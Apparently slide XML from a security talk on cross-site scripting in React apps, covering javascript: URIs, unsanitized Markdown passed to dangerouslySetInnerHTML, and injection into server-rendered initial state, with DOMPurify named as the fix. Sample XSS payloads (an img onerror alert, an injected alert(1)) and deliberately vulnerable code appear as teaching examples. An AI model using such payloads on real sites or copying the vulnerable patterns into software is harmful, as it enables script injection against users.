                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> URL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require</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>url</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>-parse"</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>url</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new</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> URL</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userinput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00FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>if</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url</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protocol</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>javascript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>:"</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return</a:t>
                      </a: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8397495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548" y="1241597"/>
            <a:ext cx="5529969" cy="3109503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219976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XSS via JavaScript URI Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good old JavaScript schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75934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with Markdown </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="10972800" cy="456867"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to display Rich Text? Use Markdown.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3090966"/>
            <a:ext cx="10972800" cy="407517"/>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t>Display Markdown in React:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5098755"/>
            <a:ext cx="10972800" cy="1214959"/>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t>Problem:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Showdown doesn’t strip out HTML from Markdown &gt; DOM-XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Solution:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sanitize Markdown with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DomPurify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2033067"/>
            <a:ext cx="5229726" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#This is my first post</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>##And, perhaps, the last one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NoCSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>') /&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3633052"/>
            <a:ext cx="5229726" cy="1331134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>convertToMarkdown</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markdown</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err="1">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converter </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new</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showdown</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Converter</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err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> data </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converter</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makeHtml</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markdown</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return</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__html</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data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>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290401468"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6141696" y="3632849"/>
          <a:ext cx="5440704" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5440704">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2631727392"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="512968">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div</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>dangerouslySetInnerHTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>this.convertToMarkdown</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>this.state.userinput</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>)}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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div</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69286949"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="336459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8573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with Markdown Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Markdown alone will not save you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3688802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Side Rendering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4960620" y="6226629"/>
            <a:ext cx="6774180" cy="188460"/>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000" dirty="0"/>
              <a:t>https://medium.com/walmartlabs/the-benefits-of-server-side-rendering-over-client-side-rendering-5d07ff2cefe8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196" y="1089746"/>
            <a:ext cx="7204604" cy="5136883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="4270280" cy="5000625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Benefits: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Consistent SEO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Architecture:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Similar to server-side templates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Security:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Adding untrusted data on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Data may be added directly to the DOM without React protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2393787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Server Side Rendering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414463"/>
            <a:ext cx="10972800" cy="1109573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two steps of SSR:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Render the HTML – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>renderToString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set initial state – passed as a JSON object into a &lt;script&gt; tag and set to a global variable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3447366"/>
            <a:ext cx="10972800" cy="1109573"/>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State is a JSON array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cannot break out of JSON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can inject angle brackets into user-controlled values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="788788368"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="4556939"/>
          <a:ext cx="10972800" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10972800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3948536230"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">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window.__APP_INITIAL_STATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>__ = {"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>isMobile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>":</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>true,"name":"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>Ksenia</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">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6544889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82897736"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2580429"/>
          <a:ext cx="10972800" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10972800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1899153274"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">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window.__PRELOADED_STATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>__ = ${</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>preloadedState</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">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313157657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92643002"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="4545798"/>
          <a:ext cx="10972800" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10972800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1673865349"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">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window.__APP_INITIAL_STATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>__ = {"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>isMobile</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>":</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>true,"name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>":"</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>alert(1)</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">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146592274"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5367483"/>
